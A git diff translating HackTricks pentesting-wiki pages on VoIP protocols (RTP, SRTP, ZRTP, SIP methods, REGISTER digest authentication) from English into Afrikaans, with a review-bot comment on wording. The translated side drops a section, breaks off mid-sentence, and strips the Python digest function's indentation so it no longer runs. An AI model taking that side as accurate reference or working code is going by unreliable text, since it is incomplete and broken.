protocols for key exchange, ZRTP is designed to work independently of the signaling protocol. It uses **Diffie-Hellman key exchange** to establish a shared secret between the communicating parties, without requiring prior trust or a public key infrastructure (PKI). ZRTP also includes features like **Short Authentication Strings (SAS)** to protect against man-in-the-middle attacks. 
+1. **RTP (Regstreekse Vervoerprotokol)**: RTP is 'n netwerkprotokol wat ontwerp is vir die aflewering van klank- en videodata, of ander regstreekse media, oor IP-netwerke. Ontwikkel deur die **IETF** en gedefinieer in **RFC 3550**, word RTP gewoonlik saam met seinprotokolle soos SIP en H.323 gebruik om multimedia-kommunikasie moontlik te maak. RTP bied meganismes vir **sinsrondering**, **volgordebepaling** en **tydstempeling** van media-strome, wat help om vlot en tydige media-afspeling te verseker. +2. **RTCP (Regstreekse Vervoerbeheerprotokol)**: RTCP is 'n metgeselprotokol vir RTP wat gebruik word vir die monitering van diensgehalte (QoS) en die voorsiening van terugvoer oor die oordrag van media-strome. Gedefinieer in dieselfde **RFC 3550** as RTP, **ruil RTCP periodiek beheerpakette uit tussen deelnemers in 'n RTP-sessie**. Dit deel inligting soos pakkieverlies, jitter en rondreistyd, wat help om netwerktoestande te diagnoseer en aan te pas, en die algehele mediakwaliteit te verbeter. +3. **SRTP (Veilige Regstreekse Vervoerprotokol)**: SRTP is 'n uitbreiding van RTP wat **enkripsie**, **boodskapverifikasie** en **herhaalbeskerming** vir media-strome bied, om die veilige oordrag van sensitiewe klank- en videodata te verseker. Gedefinieer in **RFC 3711**, gebruik SRTP kriptografiese algoritmes soos AES vir enkripsie en HMAC-SHA1 vir boodskapverifikasie. SRTP word dikwels saam met veilige seinprotokolle soos SIP oor TLS gebruik om end-to-end-veiligheid in multimedia-kommunikasie te bied. +4. **ZRTP (Zimmermann Regstreekse Vervoerprotokol)**: ZRTP is 'n kriptografiese sleutel-ooreenkomstige protokol wat **end-to-end enkripsie** vir RTP-media-strome bied. Ontwikkel deur Phil Zimmermann, die skepper van PGP, word ZRTP beskryf in **RFC 6189**. Anders as SRTP, wat afhanklik is van seinprotokolle vir sleuteluitruiling, is ZRTP ontwerp om onafhanklik van die seinprotokol te werk. 
Dit gebruik **Diffie-Hellman sleuteluitruiling** om 'n gedeelde geheim tussen die kommunikerende partye te vestig, sonder om vooraf vertroue of 'n openbare sleutel-infrastruktuur (PKI) te vereis. ZRTP sluit ook kenmerke soos **Kort Verifikasie-strings (SAS)** in om teen man-in-die-middelaanvalle te beskerm. -These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks. +Hierdie protokolle speel 'n essensiële rol in die **aflewering en beveiliging van regstreekse multimedia-kommunikasie oor IP-netwerke**. Terwyl RTP en RTCP die werklike media-oordrag en kwaliteitsmonitering hanteer, verseker SRTP en ZRTP dat die oorgedrae media beskerm is teen afluistering, manipulasie en herhaalaanvalle.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
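Review bot: In the RTP item of this hunk, "sinsrondering" is not a rendering of "synchronization"; use "sinchronisasie" (the other two terms in that triple, "volgordebepaling" and "tydstempeling", are fine). In the ZRTP item, "kriptografiese sleutel-ooreenkomstige protokol" reads as "key-corresponding protocol"; "kriptografiese sleutelooreenkomsprotokol" keeps the meaning of "key-agreement protocol". The RFC numbers (3550, 3711, 6189), the algorithm names (AES, HMAC-SHA1, Diffie-Hellman) and the SAS abbreviation carry over unchanged, which is correct.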
diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md index 9ccc38dd3..e8c0c0f59 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md @@ -1,93 +1,59 @@ -# SIP (Session Initiation Protocol) +# SIP (Sessie Inisiasie Protokol)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -SIP (Session Initiation Protocol) is a **signaling and call control protocol** widely used for establishing, modifying, and terminating multimedia sessions, including voice, video, and instant messaging, over IP networks. Developed by the **Internet Engineering Task Force (IETF)**, SIP is defined in **RFC 3261** and has become the de facto standard for VoIP and unified communications. +SIP (Sessie Inisiasie Protokol) is 'n **seintegnologie- en oproepbeheerprotokol** wat wyd gebruik word vir die vestiging, wysiging en beëindiging van multimedia-sessies, insluitend spraak, video en onmiddellike boodskappe, oor IP-netwerke. Ontwikkel deur die **Internet Engineering Task Force (IETF)**, word SIP gedefinieer in **RFC 3261** en het die de facto standaard geword vir VoIP en verenigde kommunikasie. -Some key features of SIP include: +Sommige belangrike kenmerke van SIP sluit in: -1. **Text-based Protocol**: SIP is a text-based protocol, which makes it human-readable and easier to debug. It is based on a request-response model, similar to HTTP, and uses methods like INVITE, ACK, BYE, and CANCEL for controlling call sessions. -2. **Scalability and Flexibility**: SIP is highly scalable and can be used in small-scale deployments as well as large enterprise and carrier-grade environments. It can be easily extended with new features, making it adaptable to various use cases and requirements. -3. **Interoperability**: SIP's widespread adoption and standardization ensure better interoperability between different devices, applications, and service providers, promoting seamless communication across various platforms. -4. **Modular Design**: SIP works with other protocols like **RTP (Real-time Transport Protocol)** for media transmission and **SDP (Session Description Protocol)** for describing multimedia sessions. This modular design allows for greater flexibility and compatibility with different media types and codecs. -5. 
**Proxy and Redirect Servers**: SIP can use proxy and redirect servers to facilitate call routing and provide advanced features like call forwarding, call transfer, and voicemail services. -6. **Presence and Instant Messaging**: SIP is not limited to voice and video communication. It also supports presence and instant messaging, enabling a wide range of unified communication applications. +1. **Tekstgebaseerde Protokol**: SIP is 'n tekstgebaseerde protokol, wat dit mensleesbaar maak en makliker maak om foute op te spoor. Dit is gebaseer op 'n versoek-antwoordmodel, soortgelyk aan HTTP, en gebruik metodes soos INVITE, ACK, BYE en CANCEL om oproepsessies te beheer. +2. **Skalering en Veelsydigheid**: SIP is hoogs skaalbaar en kan gebruik word in klein- en grootmaat-ondernemings- en vervoerdersomgewings. Dit kan maklik uitgebrei word met nuwe funksies, wat dit aanpasbaar maak vir verskillende gevalle en vereistes. +3. **Interoperabiliteit**: SIP se wye aanvaarding en standaardisering verseker beter interoperabiliteit tussen verskillende toestelle, toepassings en diensverskaffers, wat naadlose kommunikasie oor verskillende platforms bevorder. +4. **Modulêre Ontwerp**: SIP werk saam met ander protokolle soos **RTP (Real-time Transport Protocol)** vir media-oordrag en **SDP (Session Description Protocol)** vir die beskrywing van multimedia-sessies. Hierdie modulêre ontwerp maak groter veelsydigheid en verenigbaarheid met verskillende mediatipes en kodeks moontlik. +5. **Proxy- en Omskakelbedieners**: SIP kan gebruik maak van proxy- en omskakelbedieners om oproeprouting te fasiliteer en gevorderde funksies soos oproepstuur, oproepoordrag en voicemail-dienste te bied. +6. **Teenwoordigheid en Onmiddellike Boodskappe**: SIP is nie beperk tot spraak- en video-kommunikasie nie. Dit ondersteun ook teenwoordigheid en onmiddellike boodskappe, wat 'n wye reeks verenigde kommunikasie-toepassings moontlik maak. 
-Despite its many advantages, SIP can be complex to configure and manage, particularly when dealing with NAT traversal and firewall issues. However, its versatility, scalability, and extensive support across the industry make it a popular choice for VoIP and multimedia communication. +Ten spyte van sy vele voordele kan SIP moeilik wees om te konfigureer en bestuur, veral wanneer dit kom by NAT-deurslag en vuurmuurprobleme. Tog maak sy veelsydigheid, skalering en uitgebreide ondersteuning in die bedryf dit 'n gewilde keuse vir VoIP- en multimedia-kommunikasie. -### SIP Methods +### SIP Metodes -The core SIP methods defined in **RFC 3261** include: +Die kern-SIP-metodes wat gedefinieer is in **RFC 3261** sluit in: -1. **INVITE**: Used to **initiate a new session (call)** or modify an existing one. The INVITE method carries the session description (typically using SDP) to inform the recipient about the details of the proposed session, such as media types, codecs, and transport protocols. -2. **ACK**: Sent to **confirm the receipt** of a final response to an INVITE request. The ACK method ensures the reliability of INVITE transactions by providing end-to-end acknowledgement. -3. **BYE**: Used to **terminate an established session (call)**. The BYE method is sent by either party in the session to indicate that they wish to end the communication. -4. **CANCEL**: Sent to **cancel a pending INVITE** request before the session is established. The CANCEL method allows the sender to abort an INVITE transaction if they change their mind or if there is no response from the recipient. -5. **OPTIONS**: Used to **query the capabilities of a SIP server or user agent**. The OPTIONS method can be sent to request information about supported methods, media types, or other extensions without actually establishing a session. -6. **REGISTER**: Used by a user agent to **register its current location with a SIP registrar server**. 
The REGISTER method helps in maintaining an up-to-date mapping between a user's SIP URI and their current IP address, enabling call routing and delivery. +1. **INVITE**: Gebruik om 'n nuwe sessie (oproep) te **inisieer** of 'n bestaande een te wysig. Die INVITE-metode dra die sessiebeskrywing (gewoonlik met behulp van SDP) om die ontvanger in te lig oor die besonderhede van die voorgestelde sessie, soos mediatipes, kodeks en vervoerprotokolle. +2. **ACK**: Gestuur om die ontvangs van 'n finale antwoord op 'n INVITE-versoek te **bevestig**. Die ACK-metode verseker die betroubaarheid van INVITE-transaksies deur end-to-end-erkennings te voorsien. +3. **BYE**: Gebruik om 'n gevestigde sessie (oproep) te **beëindig**. Die BYE-metode word deur een van die partye in die sessie gestuur om aan te dui dat hulle die kommunikasie wil beëindig. +4. **CANCEL**: Gestuur om 'n hangende INVITE-versoek te **kanselleer** voordat die sessie gevestig is. Die CANCEL-metode stel die sender in staat om 'n INVITE-transaksie af te breek as hulle van gedagte verander of as daar geen antwoord van die ontvanger is nie. +5. **OPTIONS**: Gebruik om die vermoëns van 'n SIP-bediener of gebruikersagent te **ondersoek**. Die OPTIONS-metode kan gestuur word om inligting oor ondersteunde metodes, mediatipes of ander uitbreidings te versoek sonder om werklik 'n sessie te vestig. +6. **REGISTER**: Gebruik deur 'n gebruikersagent om sy huidige ligging by 'n SIP-registreerderbediener te **registreer**. Die REGISTER-metode help om 'n opgedateerde koppeling tussen 'n gebruiker se SIP-URI en hul huidige IP-adres te handhaaf, wat oproeprouting en aflewering moontlik maak. {% hint style="warning" %} -Note that to call someone it's **not neccesary to use the REGISTER** for anything.\ -However, it's possible that in order to perform an **INVITE** the caller needs to **authenticate** first or he will receive a **`401 Unauthorized`** response. 
+Let daarop dat dit **nie nodig is om die REGISTER** vir enige iets te gebruik om iemand te bel nie.\ +Dit is egter moontlik dat die oproeper in orde om 'n **INVITE** uit te voer, eers moet **geïdentifiseer** word, anders sal hy 'n **`401 Unauthorized`**-antwoord ontvang. {% endhint %} -In addition to these core methods, there are **several SIP extension methods** defined in other RFCs, such as: +Naas hierdie kernmetodes is daar **verskeie SIP-uitbreidingsmetodes** wat in ander RFC's gedefinieer is, soos: -1. **SUBSCRIBE**: Defined in RFC 6665, the SUBSCRIBE method is used to **request notifications** about the state of a specific resource, such as a user's presence or call status. -2. **NOTIFY**: Also defined in RFC 6665, the NOTIFY method is sent by a server to **inform a subscribed user agent** about changes in the state of a monitored resource. -3. **REFER**: Defined in RFC 3515, the REFER method is used to **request that the recipient performs a transfer or refers to a third party**. This is typically used for **call transfer** scenarios. -4. **MESSAGE**: Defined in RFC 3428, the MESSAGE method is used to **send instant messages between SIP user agents**, enabling text-based communication within the SIP framework. -5. **UPDATE**: Defined in RFC 3311, the UPDATE method allows **modifying a session without affecting the state of the existing dialog**. This is useful for updating session parameters, such as codecs or media types, during an ongoing call. -6. **PUBLISH**: Defined in RFC 3903, the PUBLISH method is used by a user agent to **publish event state information to a server**, making it available to other interested parties. - -### SIP Response Codes - -* **1xx (Provisional Responses)**: These responses indicate that the request was received, and the server is continuing to process it. - * 100 Trying: The request was received, and the server is working on it. - * 180 Ringing: The callee is being alerted and will take the call. 
- * 183 Session Progress: Provides information about the progress of the call. -* **2xx (Successful Responses)**: These responses indicate that the request was successfully received, understood, and accepted. - * 200 OK: The request was successful, and the server has fulfilled it. - * 202 Accepted: The request was accepted for processing, but it hasn't been completed yet. -* **3xx (Redirection Responses)**: These responses indicate that further action is required to fulfill the request, typically by contacting an alternate resource. - * 300 Multiple Choices: There are multiple options available, and the user or client must choose one. - * 301 Moved Permanently: The requested resource has been assigned a new permanent URI. - * 302 Moved Temporarily: The requested resource is temporarily available at a different URI. - * 305 Use Proxy: The request must be sent to a specified proxy. -* **4xx (Client Error Responses)**: These responses indicate that the request contains bad syntax or cannot be fulfilled by the server. - * 400 Bad Request: The request was malformed or invalid. - * 401 Unauthorized: The request requires user authentication. - * 403 Forbidden: The server understood the request but refuses to fulfill it. - * 404 Not Found: The requested resource was not found on the server. - * 408 Request Timeout: The server did not receive a complete request within the time it was prepared to wait. - * 486 Busy Here: The callee is currently busy and unable to take the call. -* **5xx (Server Error Responses)**: These responses indicate that the server failed to fulfill a valid request. - * 500 Internal Server Error: The server encountered an error while processing the request. - * 501 Not Implemented: The server does not support the functionality required to fulfill the request. - * 503 Service Unavailable: The server is currently unable to handle the request due to maintenance or overload. 
-* **6xx (Global Failure Responses)**: These responses indicate that the request cannot be fulfilled by any server. - * 600 Busy Everywhere: All possible destinations for the call are busy. - * 603 Decline: The callee does not wish to participate in the call. - * 604 Does Not Exist Anywhere: The requested resource is not available anywhere in the network. - -## Examples - -### SIP INVITE Example +1. **SUBSCRIBE**: Gedefinieer in RFC 6665, word die SUBSCRIBE-metode gebruik om **kennisgewings te versoek** oor die toestand van 'n spesifieke hulpbron, soos 'n gebruiker se teenwoordigheid of oproepstatus. +2. **NOTIFY**: Ook gedefinieer in RFC 6665, word die NOTIFY-metode deur 'n bediener gestuur om 'n geabonneerde gebruikersagent in te lig oor veranderinge in die toestand van 'n gemonitorde hulpbron. +3. **REFER**: Gedefinieer in RFC 3515, word die REFER-metode gebruik om te **versoek dat die ontvanger 'n oorplasing uitvoer of na 'n derde party verwys**. Dit word tipies gebruik vir oproepoordrag-scenarios. +4. **MESSAGE**: Gedefinieer in RFC +## Voorbeelde +### SIP INVITE Voorbeeld ``` INVITE sip:jdoe@example.com SIP/2.0 Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds @@ -110,43 +76,41 @@ t=0 0 m=audio 49170 RTP/AVP 0 a=rtpmap:0 PCMU/8000te ``` -
-Each Param Explained +Elke Parameter Verduidelik -1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - This line indicates the method (INVITE), the request URI (sip:[jdoe@example.com](mailto:jdoe@example.com)), and the SIP version (SIP/2.0). -2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - The Via header specifies the transport protocol (UDP) and the client's address (pc33.example.com). The "branch" parameter is used for loop detection and transaction matching. -3. **Max-Forwards**: `Max-Forwards: 70` - This header field limits the number of times the request can be forwarded by proxies to avoid infinite loops. -4. **To**: `To: John Doe ` - The To header specifies the recipient of the call, including their display name (John Doe) and SIP URI (sip:[jdoe@example.com](mailto:jdoe@example.com)). -5. **From**: `From: Jane Smith ;tag=1928301774` - The From header specifies the sender of the call, including their display name (Jane Smith) and SIP URI (sip:[jsmith@example.org](mailto:jsmith@example.org)). The "tag" parameter is used to uniquely identify the sender's role in the dialog. -6. **Call-ID**: `Call-ID: a84b4c76e66710` - The Call-ID header uniquely identifies a call session between two user agents. -7. **CSeq**: `CSeq: 314159 INVITE` - The CSeq header contains a sequence number and the method used in the request. It's used to match responses to requests and detect out-of-order messages. -8. **Contact**: `Contact: ` - The Contact header provides a direct route to the sender, which can be used for subsequent requests and responses. -9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - The User-Agent header provides information about the software or hardware of the sender, including its name and version. -10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - The Allow header lists the SIP methods supported by the sender. 
This helps the recipient understand which methods can be used during the communication. -11. **Content-Type**: `Content-Type: application/sdp` - The Content-Type header specifies the media type of the message body, in this case, SDP (Session Description Protocol). -12. **Content-Length**: `Content-Length: 142` - The Content-Length header indicates the size of the message body in bytes. -13. **Message Body**: The message body contains the SDP session description, which includes information about the media types, codecs, and transport protocols for the proposed session. +1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - Hierdie lyn dui die metode (INVITE), die versoek URI (sip:[jdoe@example.com](mailto:jdoe@example.com)), en die SIP-weergawe (SIP/2.0) aan. +2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - Die Via-kop spesifiseer die vervoerprotokol (UDP) en die klient se adres (pc33.example.com). Die "branch" parameter word gebruik vir lusopsporing en transaksie-passing. +3. **Max-Forwards**: `Max-Forwards: 70` - Hierdie kopvel beperk die aantal kere wat die versoek deur proksi's gestuur kan word om oneindige lusse te voorkom. +4. **To**: `To: John Doe ` - Die To-kop spesifiseer die ontvanger van die oproep, insluitend hul vertoonnaam (John Doe) en SIP URI (sip:[jdoe@example.com](mailto:jdoe@example.com)). +5. **From**: `From: Jane Smith ;tag=1928301774` - Die From-kop spesifiseer die afsender van die oproep, insluitend hul vertoonnaam (Jane Smith) en SIP URI (sip:[jsmith@example.org](mailto:jsmith@example.org)). Die "tag" parameter word gebruik om die afsender se rol in die dialoog uniek te identifiseer. +6. **Call-ID**: `Call-ID: a84b4c76e66710` - Die Call-ID-kop identifiseer uniek 'n oproepsessie tussen twee gebruikersagtente. +7. **CSeq**: `CSeq: 314159 INVITE` - Die CSeq-kop bevat 'n volgnummer en die metode wat in die versoek gebruik word. 
Dit word gebruik om reaksies aan versoek te koppel en uit-volgorde boodskappe op te spoor. +8. **Contact**: `Contact: ` - Die Contact-kop bied 'n direkte roete na die afsender, wat gebruik kan word vir volgende versoek en reaksies. +9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - Die User-Agent-kop verskaf inligting oor die sagteware of hardeware van die afsender, insluitend die naam en weergawe. +10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - Die Allow-kop lys die SIP-metodes wat deur die afsender ondersteun word. Dit help die ontvanger om te verstaan watter metodes tydens die kommunikasie gebruik kan word. +11. **Content-Type**: `Content-Type: application/sdp` - Die Content-Type-kop spesifiseer die media-tipe van die boodskaplêer, in hierdie geval SDP (Session Description Protocol). +12. **Content-Length**: `Content-Length: 142` - Die Content-Length-kop dui die grootte van die boodskaplêer in bytes aan. +13. **Boodskaplêer**: Die boodskaplêer bevat die SDP-sessiebeskrywing, wat inligting bevat oor die media-tipes, kodeks, en vervoerprotokolle vir die voorgestelde sessie. -* `v=0` - Protocol version (0 for SDP) -* `o=jsmith 2890844526 2890842807 IN IP4 pc33.example.com` - Originator and session identifier -* `s=-` - Session name (a single hyphen indicates no session name) -* `c=IN IP4 pc33.example.com` - Connection information (network type, address type, and address) -* `t=0 0` - Timing information (start and stop times, 0 0 means the session is not bounded) -* `m=audio 49170 RTP/AVP 0` - Media description (media type, port number, transport protocol, and format list). In this case, it specifies an audio stream using RTP/AVP (Real-time Transport Protocol / Audio Video Profile) and format 0 (PCMU/8000). -* `a=rtpmap:0 PCMU/8000` - Attribute mapping the format (0) to the codec (PCMU) and its clock rate (8000 Hz). 
+* `v=0` - Protokolweergawe (0 vir SDP) +* `o=jsmith 2890844526 2890842807 IN IP4 pc33.example.com` - Oorsprong en sessie-identifiseerder +* `s=-` - Sessienaam (een enkele koppelteken dui aan dat daar geen sessienaam is nie) +* `c=IN IP4 pc33.example.com` - Verbindingsinligting (netwerk tipe, adres tipe, en adres) +* `t=0 0` - Tydsinligting (begin- en eindtye, 0 0 beteken dat die sessie nie begrens is nie) +* `m=audio 49170 RTP/AVP 0` - Media-beskrywing (media tipe, poortnommer, vervoerprotokol, en formaatlys). In hierdie geval spesifiseer dit 'n klankstroom wat gebruik maak van RTP/AVP (Real-time Transport Protocol / Audio Video Profile) en formaat 0 (PCMU/8000). +* `a=rtpmap:0 PCMU/8000` - Eienskap wat die formaat (0) aan die kodek (PCMU) en sy klokspoed (8000 Hz) koppel.
-### SIP REGISTER Example +### SIP REGISTER Voorbeeld -The REGISTER method is used in Session Initiation Protocol (SIP) to allow a user agent (UA), such as a VoIP phone or a softphone, to **register its location with a SIP registrar server**. This process lets the server know **where to route incoming SIP requests destined for the registered user**. The registrar server is usually part of a SIP proxy server or a dedicated registration server. +Die REGISTER-metode word in die Session Initiation Protocol (SIP) gebruik om 'n gebruikersagtent (UA), soos 'n VoIP-foon of 'n sagtfoon, in staat te stel om **sy ligging by 'n SIP-registrasiebediener te registreer**. Hierdie proses laat die bediener weet **waarheen inkomende SIP-versoeke vir die geregistreerde gebruiker gestuur moet word**. Die registrasiebediener is gewoonlik deel van 'n SIP-proksibediener of 'n toegewyde registrasiebediener. -Here's a detailed example of the SIP messages involved in a REGISTER authentication process: - -1. Initial **REGISTER** request from UA to the registrar server: +Hier is 'n gedetailleerde voorbeeld van die SIP-boodskappe wat betrokke is by 'n REGISTER-verifikasieproses: +1. Aanvanklike **REGISTER** versoek van UA na die registrasiebediener: ```yaml REGISTER sip:example.com SIP/2.0 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds 
@@ -159,11 +123,9 @@ Contact: ;expires=3600 Expires: 3600 Content-Length: 0 ``` +Hierdie aanvanklike REGISTER-boodskap word deur die UA (Alice) na die registrasiebediener gestuur. Dit sluit belangrike inligting in soos die gewenste registrasie-tydsduur (Expires), die gebruiker se SIP URI (sip:[alice@example.com](mailto:alice@example.com)), en die gebruiker se kontakadres (sip:alice@192.168.1.100:5060). -This initial REGISTER message is sent by the UA (Alice) to the registrar server. It includes important information such as the desired registration duration (Expires), the user's SIP URI (sip:[alice@example.com](mailto:alice@example.com)), and the user's contact address (sip:alice@192.168.1.100:5060). - -2. **401 Unauthorized** response from the registrar server: - +2. **401 Onbevoegd** antwoord van die registrasiebediener: ```css cssCopy codeSIP/2.0 401 Unauthorized Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds @@ -174,11 +136,9 @@ CSeq: 1 REGISTER WWW-Authenticate: Digest realm="example.com", nonce="abcdefghijk", algorithm=MD5, qop="auth" Content-Length: 0 ``` +Die registrasiebediener reageer met 'n "401 Onbevoegde" boodskap, wat 'n "WWW-Authenticate" kop bevat. Hierdie kop bevat inligting wat vereis word vir die UA om homself te verifieer, soos die **verifikasiegebied, nonce, en algoritme**. -The registrar server responds with a "401 Unauthorized" message, which includes a "WWW-Authenticate" header. This header contains information required for the UA to authenticate itself, such as the **authentication realm, nonce, and algorithm**. - -3. REGISTER request **with authentication credentials**: - +3. REGISTREER versoek **met verifikasielegitimasie**: ```vbnet REGISTER sip:example.com SIP/2.0 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds 
@@ -192,28 +152,26 @@ Expires: 3600 Authorization: Digest username="alice", realm="example.com", nonce="abcdefghijk", uri="sip:example.com", response="65a8e2285879283831b664bd8b7f14d4", algorithm=MD5, cnonce="lmnopqrst", qop=auth, nc=00000001 Content-Length: 0 ``` +Die UA stuur 'n ander REGISTER versoek, hierdie keer met die **"Authorization" kop met die nodige geloofsbriewe, soos die gebruikersnaam, realm, nonce, en 'n responswaarde** wat bereken word met behulp van die verskafte inligting en die gebruiker se wagwoord. -The UA sends another REGISTER request, this time including the **"Authorization" header with the necessary credentials, such as the username, realm, nonce, and a response value** calculated using the provided information and the user's password. - -This is how the **Authorizarion response** is calculated: - +So word die **Authorizarion respons** bereken: ```python import hashlib def calculate_sip_md5_response(username, password, realm, method, uri, nonce, nc, cnonce, qop): - # 1. Calculate HA1 (concatenation of username, realm, and password) - ha1_input = f"{username}:{realm}:{password}" - ha1 = hashlib.md5(ha1_input.encode()).hexdigest() +# 1. Calculate HA1 (concatenation of username, realm, and password) +ha1_input = f"{username}:{realm}:{password}" +ha1 = hashlib.md5(ha1_input.encode()).hexdigest() - # 2. Calculate HA2 (concatenation of method and uri) - ha2_input = f"{method}:{uri}" - ha2 = hashlib.md5(ha2_input.encode()).hexdigest() +# 2. Calculate HA2 (concatenation of method and uri) +ha2_input = f"{method}:{uri}" +ha2 = hashlib.md5(ha2_input.encode()).hexdigest() - # 3. Calculate the final response value (concatenation of h1, stuff and h2) - response_input = f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}" - response = hashlib.md5(response_input.encode()).hexdigest() +# 3. 
Calculate the final response value (concatenation of h1, stuff and h2) +response_input = f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}" +response = hashlib.md5(response_input.encode()).hexdigest() - return response +return response # Example usage username = "alice" @@ -229,9 +187,7 @@ qop = "auth" response = calculate_sip_md5_response(username, password, realm, method, uri, nonce, nc, cnonce, qop) print(f"MD5 response value: {response}") ``` - -4. **Successful registration** response from the registrar server: - +4. **Suksesvolle registrasie** respons van die registrasiebediener: ```yaml SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds @@ -243,27 +199,26 @@ Contact: ;expires=3600 Expires: 3600 Content-Length: 0 ``` +Nadat die registrasieserver die voorsiene geloofsbriewe geverifieer het, **stuur dit 'n "200 OK" antwoord om aan te dui dat die registrasie suksesvol was**. Die antwoord bevat die geregistreerde kontakinligting en die vervaltyd vir die registrasie. Op hierdie punt is die gebruikersagent (Alice) suksesvol geregistreer by die SIP-registrasieserver, en inkomende SIP-versoeke vir Alice kan na die toepaslike kontakadres gerouteer word. -After the registrar server verifies the provided credentials, **it sends a "200 OK" response to indicate that the registration was successful**. The response includes the registered contact information and the expiration time for the registration. At this point, the user agent (Alice) is successfully registered with the SIP registrar server, and incoming SIP requests for Alice can be routed to the appropriate contact address. - -### Call Example +### Oproepvoorbeeld
{% hint style="info" %} -It's not mentioned, but User B needs to have sent a **REGISTER message to Proxy 2** before he is able to receive calls. +Dit word nie genoem nie, maar Gebruiker B moet 'n **REGISTER-boodskap na Proxy 2 gestuur het** voordat hy oproepe kan ontvang. {% endhint %}
